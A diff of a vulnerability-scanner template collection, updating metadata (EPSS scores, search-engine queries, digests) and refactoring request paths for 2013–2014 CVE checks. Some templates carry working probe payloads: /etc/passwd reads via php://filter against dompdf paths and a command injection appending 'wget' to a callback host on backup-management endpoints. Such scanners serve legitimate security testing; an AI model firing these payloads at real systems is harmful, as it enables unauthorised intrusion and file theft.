cwe-id: CWE-22
- epss-score: 0.04915
- epss-percentile: 0.92611
+ epss-score: 0.07984
+ epss-percentile: 0.94272
cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100be02fdac786e491610190b50099a0ce87960337c3a64fadd06f6408ebb147fd4022100b3295a49e65f499266d917bc52808ccfae6264f6b448c06983015d0c26d25b51:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml
index 255fd4324b..85c15c787b 100644
--- a/http/cves/2013/CVE-2013-6281.yaml
+++ b/http/cves/2013/CVE-2013-6281.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 4.3
cve-id: CVE-2013-6281
cwe-id: CWE-79
- epss-score: 0.00327
- epss-percentile: 0.70301
+ epss-score: 0.0028
+ epss-percentile: 0.68344
cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203db25db5e5e4de50aae341f22577f8b8d710ac7791654e1776574087a8c3811a022100a2d6c799f3f59792aa66f7430884805852e965ce2a6bd7d03c5af47273175891:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml
index 44c34d428f..d18c3a90a6 100644
--- a/http/cves/2013/CVE-2013-7091.yaml
+++ b/http/cves/2013/CVE-2013-7091.yaml
@@ -27,6 +27,9 @@ info:
max-request: 2
vendor: synacor
product: zimbra_collaboration_suite
+ shodan-query: http.title:"zimbra collaboration suite"
+ fofa-query: title="zimbra web client sign in"
+ google-query: intitle:"zimbra collaboration suite"
tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor
http:
@@ -53,4 +56,4 @@ http:
- type: regex
regex:
- "root=.*:0:0"
-# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022018e933dc0b64a50fc2fb2291fe0fe068e3b6ce401606ccfaca77a770b2b90880022100a65f7680f5397809fd6e7166167c9d7fb89e30c85c2c4ce8e5ddf62ff1c513fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml
index d0998b099d..e094bca331 100644
--- a/http/cves/2013/CVE-2013-7240.yaml
+++ b/http/cves/2013/CVE-2013-7240.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 5
cve-id: CVE-2013-7240
cwe-id: CWE-22
- epss-score: 0.21533
- epss-percentile: 0.96023
+ epss-score: 0.26523
+ epss-percentile: 0.96738
cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100cce17b78559a95bf2f0943f96165e78642e273d655b3c17c6881820cc40df09f02207f5a415fa7bf76725f80007066ad4921d9425a34255db8d656c34257296adea3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210085e6d112ea7ef4a7833a7668c6b051ac44855b70dd7ec05c658983adcf4680ec022006588657644bf9bde06a06488d6bdb794f501662fbd380395fdcd12e2ad45ac4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml
index ac36dc0e9f..a5801ff21f 100644
--- a/http/cves/2014/CVE-2014-1203.yaml
+++ b/http/cves/2014/CVE-2014-1203.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-1203
cwe-id: CWE-77
epss-score: 0.02045
- epss-percentile: 0.88732
+ epss-percentile: 0.88951
cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022020888617dfe71531e618697e0fcccf4fcafa03fe02c295f230589d7449890a0002201f877c208eb1418846e64b8bc9cd8c4677f3f5464219102de5c4a0c3dbe7dea2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml
index 68d8ce7de3..627cea34a5 100644
--- a/http/cves/2014/CVE-2014-2321.yaml
+++ b/http/cves/2014/CVE-2014-2321.yaml
@@ -21,13 +21,14 @@ info:
cvss-score: 10
cve-id: CVE-2014-2321
cwe-id: CWE-264
- epss-score: 0.96364
- epss-percentile: 0.99452
+ epss-score: 0.95464
+ epss-percentile: 0.99375
cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zte
product: f460
+ shodan-query: cpe:"cpe:2.3:h:zte:f460"
tags: cve2014,cve,iot,zte
http:
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022023bcec4a925719964d361455cce2d3185288b3dd03c0a9b3a61f8704b16ca756022100e7f90ae800794e873f1ef774d97e8007a67fbc2cf35e4fde660f40f31f262a43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a9d734021576f1426ea4a0bd73c67beadc43c253784846f91ddffd41f597880b022100f7963910ee7952b9952e3441d9815f03d92ed7cac15c88325decc2535dbdc943:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml
index 6b84e07eae..099301f4da 100644
--- a/http/cves/2014/CVE-2014-2323.yaml
+++ b/http/cves/2014/CVE-2014-2323.yaml
@@ -21,12 +21,13 @@ info:
cve-id: CVE-2014-2323
cwe-id: CWE-89
epss-score: 0.96033
- epss-percentile: 0.99445
+ epss-percentile: 0.99481
cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: lighttpd
product: lighttpd
+ shodan-query: cpe:"cpe:2.3:a:lighttpd:lighttpd"
tags: cve2014,cve,lighttpd,injection,seclists,sqli
http:
@@ -40,4 +41,4 @@ http:
- type: regex
regex:
- "root:[x*]:0:0:"
-# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fc41963e152cb80e35da8316c109132de19ba635d41d2245381f2aaa2dff5cce022100b03b8f8c2427915570f9d5409a48ee44032f1e4e53c6ad8d22c5fb31353f4170:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml
index 5a670d5f91..b8bb69ab43 100644
--- a/http/cves/2014/CVE-2014-2383.yaml
+++ b/http/cves/2014/CVE-2014-2383.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 6.8
cve-id: CVE-2014-2383
cwe-id: CWE-200
- epss-score: 0.00511
- epss-percentile: 0.76134
+ epss-score: 0.00363
+ epss-percentile: 0.72296
cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:*
metadata:
verified: true
@@ -34,17 +34,21 @@ info:
http:
- method: GET
path:
- - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}{{paths}}"
+
+ payloads:
+ paths:
+ - "/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
+ - "/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
stop-at-first-match: true
@@ -64,4 +68,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200f047a6a60901eeb5016353d7e3b93092b406eb7c4eaa8ecf9759f8b6ea7e81a022100c25b83b98679c1421d0b2383cdc9c6f9c736059731e9452b26d580b80e55e4ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b7c90a2cfbe459a87dbbb307df3db7b44141074b36c34f8a61575b2ca7591520221009ea5a6ab23f19df671509f8466d795fcbeb8d48d995c89926ced47f9d3c8cd98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml
index 3ac2dfa0fe..41976e5eb4 100644
--- a/http/cves/2014/CVE-2014-2908.yaml
+++ b/http/cves/2014/CVE-2014-2908.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 4.3
cve-id: CVE-2014-2908
cwe-id: CWE-79
- epss-score: 0.00594
- epss-percentile: 0.76056
+ epss-score: 0.0045
+ epss-percentile: 0.75068
cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202a67b8f296a38cdec3cc9fadbed079d23964fcd5973e2a30a4ebc3588772051e022100acee6714b419eaf8cf4ab99aef816ab12d1a04410e9aef0c8a18a45744943b0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201e07a87ca92a45e0c3e683810fe75ea4e13ef439d9c0761076ae7b1b3fedf1e402200f35676062726a99b31baaabd9878723ace952a9551ab845fb96fca30fd34799:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml
index 1b31232ed7..84a5c2a95d 100644
--- a/http/cves/2014/CVE-2014-2962.yaml
+++ b/http/cves/2014/CVE-2014-2962.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 7.8
cve-id: CVE-2014-2962
cwe-id: CWE-22
- epss-score: 0.95825
- epss-percentile: 0.99395
+ epss-score: 0.95717
+ epss-percentile: 0.99419
cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fef1c81653b445d6876bb813525f0ad4a8d2f3bce3bf5fac3b7ae67f02ab55c9022100a8189aa1f6dba2f15e80d4fb511041f7e6a5e5921e7e9e82e118a1cb99f33559:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml
index c28ab34ad6..c9630b30e8 100644
--- a/http/cves/2014/CVE-2014-3120.yaml
+++ b/http/cves/2014/CVE-2014-3120.yaml
@@ -22,12 +22,13 @@ info:
cve-id: CVE-2014-3120
cwe-id: CWE-284
epss-score: 0.53209
- epss-percentile: 0.97551
+ epss-percentile: 0.97602
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: elasticsearch
product: elasticsearch
+ fofa-query: index_not_found_exception
tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic
http:
@@ -71,4 +72,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201147887d505805312869c53cf391931fb435d6ebb2a345de1298e9952e16582f0221008773ca103f3f110dd79ec2c08eff64ab0ea1d59fa388f1d9470371900fc9f0f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml
index 17c94b7d1a..1eef11da3d 100644
--- a/http/cves/2014/CVE-2014-3206.yaml
+++ b/http/cves/2014/CVE-2014-3206.yaml
@@ -12,7 +12,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
- - https://www.exploit-db.com/exploits/33159/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@@ -31,18 +30,17 @@ info:
http:
- raw:
- |
- GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
+ GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
- GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
+ GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
-# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml
index 3bf155e20d..a4025a14c3 100644
--- a/http/cves/2014/CVE-2014-3744.yaml
+++ b/http/cves/2014/CVE-2014-3744.yaml
@@ -21,12 +21,13 @@ info:
cve-id: CVE-2014-3744
cwe-id: CWE-22
epss-score: 0.00672
- epss-percentile: 0.77635
+ epss-percentile: 0.79778
cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: nodejs
product: node.js
+ shodan-query: cpe:"cpe:2.3:a:nodejs:node.js"
tags: cve2014,cve,lfi,nodejs,st
http:
@@ -43,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502203d8c11ba1a31ffd7910585875338d74bcd708cd45c0dced1bc16f9ac789f0d3f022100d17f317a0370341a66779fb76b7e4559c2db7104613304dbd1455b6344151bfe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205aac669d4a5a54dc948c50fd092acac57e7866b919782b44ac4830002791e4c20220754b3c310957be2dcb62fcf22f2dae9be958dd7d837d96fdaae4bab0f1ac0b72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml
index 1f6974f7c3..6eeb36f740 100644
--- a/http/cves/2014/CVE-2014-4210.yaml
+++ b/http/cves/2014/CVE-2014-4210.yaml
@@ -20,14 +20,16 @@ info:
cvss-score: 5
cve-id: CVE-2014-4210
cwe-id: NVD-CWE-noinfo
- epss-score: 0.96955
- epss-percentile: 0.9967
+ epss-score: 0.96657
+ epss-percentile: 0.99634
cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: oracle
product: fusion_middleware
shodan-query: title:"Weblogic"
+ fofa-query: title="weblogic"
+ google-query: intitle:"weblogic"
tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss
http:
@@ -50,4 +52,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205b0c4c45a1197068fe3d1c2e791783fc70cbcc9d3206f6e804636e2d200cef0c022100fc157a501cabd7d4201b7164e0daf392f982fa00c7962aa21e21c9b38dbd4618:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b52e22b2b25abe5a19f721f332e8bf75bada2eb3d19c315bf4bcae42f83438c702206adca2c25b6c0ea47b913fdf0f2fc8b7c8d803f4a2f7dd210e6fe66dea2b7a4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml
index 8c002e1bc1..b2ad8dcb63 100644
--- a/http/cves/2014/CVE-2014-4536.yaml
+++ b/http/cves/2014/CVE-2014-4536.yaml
@@ -14,13 +14,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
- http://wordpress.org/plugins/infusionsoft/changelog
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4536
cwe-id: CWE-79
epss-score: 0.00149
- epss-percentile: 0.50857
+ epss-percentile: 0.50948
cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -29,7 +30,6 @@ info:
framework: wordpress
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
-
flow: http(1) && http(2)
http:
@@ -66,4 +66,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204632ba857d80985897ff6ed55d02178be53aea7b5bbeeb24fcd6e920d59022ed022100e4aa6568eb57f3a3597613e71186f142e2d44b6a70d5ad43a297aa76e6a2d89b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204f574903d83a5801ef1d9545beaaa47d7c0488d0f6557a301e114d7b8bb6943902204dffab422339ed830bd7129f4941e1f0e386dce61aa3fee7d5c6e576a400d675:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml
index 41d512b06b..cb9287e5f9 100644
--- a/http/cves/2014/CVE-2014-4539.yaml
+++ b/http/cves/2014/CVE-2014-4539.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2014-4539
cwe-id: CWE-79
epss-score: 0.00135
- epss-percentile: 0.47838
+ epss-percentile: 0.48718
cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -28,7 +28,6 @@ info:
product: movies
framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
-
flow: http(1) && http(2)
http:
@@ -64,4 +63,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022030275d63dbfe56697607c6334a3c8a5811e5cb33d54692005337774bf344cebd022100afc9d9c7a60dabf6c42cb4ed7d333e4e6591ba5fba7baeaaf2b7af52de3126c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009a3a6da10e2646e323b0e1402df5a0a8f1f7f1bd7f360285e9ce6c860044ee4f022100ed819ebc2215ceb117a336038a31b1e1403f039b09870e097bcde02e57e05aea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml
index f87981322e..5819de6277 100644
--- a/http/cves/2014/CVE-2014-4558.yaml
+++ b/http/cves/2014/CVE-2014-4558.yaml
@@ -13,13 +13,14 @@ info:
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
- http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4558
cwe-id: CWE-79
epss-score: 0.00135
- epss-percentile: 0.48556
+ epss-percentile: 0.48718
cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -27,7 +28,6 @@ info:
product: swipehq-payment-gateway-woocommerce
framework: wordpress
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany
-
flow: http(1) && http(2)
http:
@@ -60,4 +60,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022055663e58bcf6513417455b0efb0c97cfbac07cc9b0a2f73d2e0d75584454220102205bcd4da9178ae324924159c8150a0ff2df766bc8e7b3ec9b711da13f1de2cd8d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207e22cdf6282c4a98b8dd936fe0b27f53880ba1510bcc2635b4ec310f92b090b8022100fa2e5048f8201cb3ff0c7107646d7d7ce231f377f9e085d0b676a185a3c2fa1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml
index b1e5187f18..ca0f4e8917 100644
--- a/http/cves/2014/CVE-2014-4561.yaml
+++ b/http/cves/2014/CVE-2014-4561.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2014-4561
cwe-id: CWE-79
epss-score: 0.00098
- epss-percentile: 0.40364
+ epss-percentile: 0.40792
cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -28,7 +28,6 @@ info:
product: ultimate-weather
framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
-
flow: http(1) && http(2)
http:
@@ -64,4 +63,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ec3f2f4560e6231b16182d21760fdcc4a70b5d2aee0351cfbb9af25a402e2cad022100ba3b535bfbc3654a873212a9181fa6e19aa7a5dd22f2e02ff1fe3e15527b287e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e855f89287ebae2fedab76dbc205d7826f347f223499b7d29ca203da114980e0022100a9d104e9dfde8d776e11958351e829597e081afcab74bfae85f5388768d7a13d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml
index 90fe1a1ae5..74f2b7ba36 100644
--- a/http/cves/2014/CVE-2014-4940.yaml
+++ b/http/cves/2014/CVE-2014-4940.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 5
cve-id: CVE-2014-4940
cwe-id: CWE-22
- epss-score: 0.03212
- epss-percentile: 0.90985
+ epss-score: 0.05292
+ epss-percentile: 0.93046
cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fdcfab4922d8796050d75ce54d86d802b84c2037d6d63c97d6389b57ae60133002203a8bde99ea662cc20e306372114e7105ad88ec62a42c7812e0a13c7d085109d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml
index 8df99e4d08..962a5e9d0f 100644
--- a/http/cves/2014/CVE-2014-5258.yaml
+++ b/http/cves/2014/CVE-2014-5258.yaml
@@ -27,6 +27,7 @@ info:
max-request: 1
vendor: webedition
product: webedition_cms
+ shodan-query: cpe:"cpe:2.3:a:webedition:webedition_cms"
tags: cve2014,cve,edb,packetstorm,lfi,webedition
http:
@@ -43,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f41fce0fe4ea55afe08e392d357d518f76a79c6defb6ca8511b388f8f100022a022050e3e10019d9333356dbe6e594d74c2e80530f624096c57c74b70f954cbb276f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml
index 3285c6d48f..d39748ec44 100644
--- a/http/cves/2014/CVE-2014-6271.yaml
+++ b/http/cves/2014/CVE-2014-6271.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-6271
cwe-id: CWE-78
epss-score: 0.97559
- epss-percentile: 0.99997
+ epss-percentile: 0.99998
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
metadata:
max-request: 8
@@ -32,14 +32,17 @@ info:
http:
- method: GET
path:
- - "{{BaseURL}}"
- - "{{BaseURL}}/cgi-bin/status"
- - "{{BaseURL}}/cgi-bin/stats"
- - "{{BaseURL}}/cgi-bin/test"
- - "{{BaseURL}}/cgi-bin/status/status.cgi"
- - "{{BaseURL}}/test.cgi"
- - "{{BaseURL}}/debug.cgi"
- - "{{BaseURL}}/cgi-bin/test-cgi"
+ - "{{BaseURL}}{{paths}}"
+ payloads:
+ paths:
+ - ""
+ - "/cgi-bin/status"
+ - "/cgi-bin/stats"
+ - "/cgi-bin/test"
+ - "/cgi-bin/status/status.cgi"
+ - "/test.cgi"
+ - "/debug.cgi"
+ - "/cgi-bin/test-cgi"
stop-at-first-match: true
@@ -58,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
